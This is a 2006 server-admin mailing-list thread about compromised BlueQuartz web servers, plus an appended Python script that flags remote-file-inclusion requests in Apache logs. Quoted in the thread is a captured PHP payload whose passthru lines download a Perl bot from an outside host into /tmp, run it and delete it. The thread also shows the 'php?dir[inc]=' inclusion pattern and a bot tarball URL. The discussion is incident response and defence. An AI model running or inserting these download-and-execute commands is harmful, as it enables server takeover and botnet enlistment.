
Date:  Tue, 12 Sep 2006 08:36:19 +0200
From:  Tom Müller-Kortkamp <tmueko (at mark) kommunity.net>
Subject:  [coba-e:06848] Re: /TMP Directory
To:  coba-e (at mark) bluequartz.org
Message-Id:  <C7EAC357-F7F2-4E76-9B98-88BEB206F3A8 (at mark) kommunity.net>
In-Reply-To:  <4505E107.1060300 (at mark) planetcentral.net>
References:  <002701c6d450$c0c58480$6400a8c0 (at mark) YOUR4105E587B6> <02d601c6d583$ee2f57f0$0e00a8c0 (at mark) office.swiftinter.net> <4505E107.1060300 (at mark) planetcentral.net>
X-Mail-Count: 06848

As the owner is apache, you have to find it there.
I would start searching in the users' home directories: there are also
often weak user passwords, where the hacker uploads the first routine
and starts it via browser...

Try this: "find /home/sites/*/users/*/web -exec grep matahati {} /dev/null \;"

I found something like this here:
http://channels.dal.net/matahati/matahati.tar.gz
Looks like some IRC bot.


On 12.09.2006 at 00:19, paul wrote:

> :o oh my god... have been trying for the last 2 days to work out
> what was up with my server, and that's it....
>
> I seem to have the following in my /tmp folder :
>
>
> total 44
> drwxrwxrwt   5 root   root   4096 Sep 11 23:11 .
> drwxr-xr-x  25 root   root   4096 Sep 11 22:10 ..
> -rw-------   1 root   root     49 Sep 11 23:11 ClamAVBusy.lock
> drwxrwxrwt   2 root   root   4096 Sep 11 22:10 .ICE-unix
> drwxr-xr-x  10 apache apache 4096 Sep 11 22:09 .LiveZone
> drwxr-xr-x   9 apache apache 4096 Sep 11 23:06 matahati
> -rw-------   1 root   root   4697 Sep  9 21:35 .spamassassin4037sdcX9Htmp
> -r--r--r--   1 root   root    275 Sep 11 23:01 yum.check-update
> -rw-r--r--   1 root   root   1367 Sep 11 05:31 yum.update
>
> Now the Clam I can understand. The yum and the SpamAssassin also.
> The rest shouldn't be there and needs to be removed.
>
> Please PLEASE could someone tell me how I can rid myself of this!
>
> Now I know why I'm getting perl scripts hanging, using 98% CPU time,
> and the box load hits over 50 and things stop working!
>
> Please help... It's only a home box with a couple of sites on it,
> but I want to get it back!!
>
> Thanks
> Paul
>
>
> Paul Wilson - Swift Internet wrote:
>> It is also likely that your PHP script has a severe vulnerability in it
>>
>> I think the attack was in two parts - did you see the php script  
>> being used in the following way (check your access_log)
>>
>> ****php?dir[inc]=http:// "URL location of attack script"
>>
>> This script would then be run to pull in the v6 script that you  
>> saw in action.
>>
>>
>> The "php?dir[inc]" vulnerability became known at the tail end of  
>> August, so these attacks are going to become more widespread.
>>
>> And yes, one of our servers was hit this way.
>>
>>
>> Regards
>>
>> Paul
>>
>>
>> ----- Original Message ----- From: "Darrell D. Mobley" <dmobley (at mark) uhostme.net>
>> To: <coba-e (at mark) bluequartz.org>
>> Sent: Saturday, September 09, 2006 9:44 PM
>> Subject: [coba-e:06808] /TMP Directory
>>
>>
>>> There was some discussion here lately about the security fix that
>>> stopped programs from running in /TMP.  Is this configured by default
>>> if you have your BQ Yum updated?  I got a DDOS today where the users
>>> were trying to run the following program via PHP:
>>>
>>> <?
>>> passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;curl -O http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;lwp-download http://perqafohu.com/~armendibx/oki/v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;lynx -source http://perqafohu.com/~armendibx/oki/v6.txt > v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;fetch http://perqafohu.com/~armendibx/oki/v6.txt > v6.txt;perl v6.txt;rm -f v6*');
>>> passthru('cd /tmp;GET http://perqafohu.com/~armendibx/oki/v6.txt > v6.txt;perl v6.txt;rm -f v6*');
>>> ?>
>>>
>>> The v6.txt is a Perl script that installs some IRC software and
>>> monitors IRC on open ports.  I do not think the script was successful
>>> in running, but I just want to make sure the /TMP security is enabled
>>> where files can't be run there.  While I don't think the DDOS attack
>>> was successful in running the script, it was successful in shutting
>>> down the server due to MySQL becoming overwhelmed.  Server load was up
>>> to 156!
>>>
>>> Any suggestions would be appreciated.
>>>
>>>
>>
>>

-- 
kommunity GmbH & Co.KG
Tom Müller-Kortkamp
Netzwerke & Internet
Goseriede 4
D-30159 Hannover

Phone +49 (0)5 11 - 80 72 58 0
Fax +49 (0)5 11 - 80 72 58 10
http://www.kommunity.net
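A defender-side version of the access_log check Paul Wilson suggests in the thread, added here as an example (not code from any poster): it parses Apache combined-format lines and reports requests whose query-string parameter value is a remote URL, the shape of the `php?dir[inc]=http://...` requests described above. The log lines, IP addresses and hostnames in it are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access_log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Sep/2006:22:09:14 +0000] "GET /index.php?page=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Sep/2006:22:09:40 +0000] "GET /gallery.php?dir[inc]=http://attacker.example/cmd.txt HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
198.51.100.2 - - [11/Sep/2006:22:10:02 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Sep/2006:22:11:17 +0000] "GET /site.php?inc=ftp%3A%2F%2Fattacker.example%2Fv6.txt HTTP/1.0" 500 0 "-" "curl/7.15"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A parameter value that starts with a remote scheme is the inclusion pattern we look for.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (client_ip, request_target, parameter_name) for each request
    carrying a remote URL in any query-string parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl percent-decodes values, so the encoded ftp%3A%2F%2F form is caught too
            if REMOTE_SCHEME_RE.match(value.strip()):
                hits.append((m.group("ip"), m.group("target"), name))
                break  # one report per request is enough
    return hits


if __name__ == "__main__":
    for ip, target, param in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} remote URL in parameter {param!r}: {target}")
```

If the /tmp fix discussed in the thread is a noexec mount (an assumption; the posts do not say), note that it does not stop `perl v6.txt`, because the interpreter reads the file rather than executing it. Catching the inclusion request in access_log is therefore the earlier control.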